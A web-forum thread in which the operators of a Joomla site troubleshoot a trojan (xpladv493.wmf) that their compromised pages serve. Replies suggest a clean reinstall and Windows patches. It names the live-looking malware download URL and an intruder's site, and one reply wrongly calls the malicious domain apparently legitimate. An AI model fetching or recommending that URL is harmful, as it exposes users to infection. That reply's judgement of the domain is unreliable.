Recently bytezandpieces.com has contracted a virus of the trojan variety. I'm not sure how it got it, but it certainly has a trojan of some kind. I couldn't find much in the way of information on it, save for that it tries to load a .wmv. Avg picks it up before it causes too much trouble. Also, it usually crashes IE. Any advice on how to clear this up?

Have you googled the trojan's name?

Oh...and welcome to the forums!

Welcome to the forums.

Are you sure of the spelling? I've searched several databases and have found nothing on Xplad.v

Welcome to the forum, Terje.

I searched a bit and did not find the exact name you are saying but I found info on some with similar names.

See if these helps:

http://www.pestpatrol.com/spywarecenter/pest.aspx?id=24731
http://www.pandasoftware.com/com/virus_info/encyclopedia/overview.aspx?idvirus=31604&sitepanda=particulares

I help run bytezandpieces.com, and today while I was fiddling around I noticed that the site is downloading the trojan from the following address: zbzppbwqmm.biz/dl/adv493.php

I also noticed the program "webalizer" in my tmp file and wasn't sure if this was related or not. I am not up on script enough to be able to pick out what on my page is causing me to download from this website, and webalizer is open source so I asume it could be used for good or evil. Any suggestions? Thanks,

Sass

Welcome to the forums Sass

Webalizer is a site statistics script similar to AwStats. This should not be downloading anything.

That's good to know. I still wonder what is telling my site to download the trojan.

Just an update: I found a calling card by someone calling himself "Partizan." He links to the following site:
http://kizil.org/. I wasn't sure if there was a procedure for reporting these guys or what, but I think he is exploiting our news management system. I'm working on it as we speak.

Sass

One more update, the full name of the trojan is xpladv493[1].wmf I recently saw one other site that it had hit, it isn't very widespread yet apparently.

I just did a google search and came up with two entries. One of them had to do with Joomla! v 1.0.10 (the latest one). The entry was written in Dutch, but you can bet I'll be paying a little more closer attention to the Joomla! web site in the coming month or so!

Not sure why you are downloading but this appears to be a legit site. The whois data on the domain appears to be a real person and all the information "looks" real. When you goto the domain h_tp://zbzppbwqmm.biz/ it brings up a "Fedora Core Test Page".

Have a look at this site for some interesting info on this.

It looks like the original person on the Joomla website was at 1.0.8 and it may have already been there before they updated to 1.0.10

If your still having problems, backup your joomla website and remove all the files and upload a fresh set.

If you have an upto date window XP, it should be patched againest this flaw.

JimE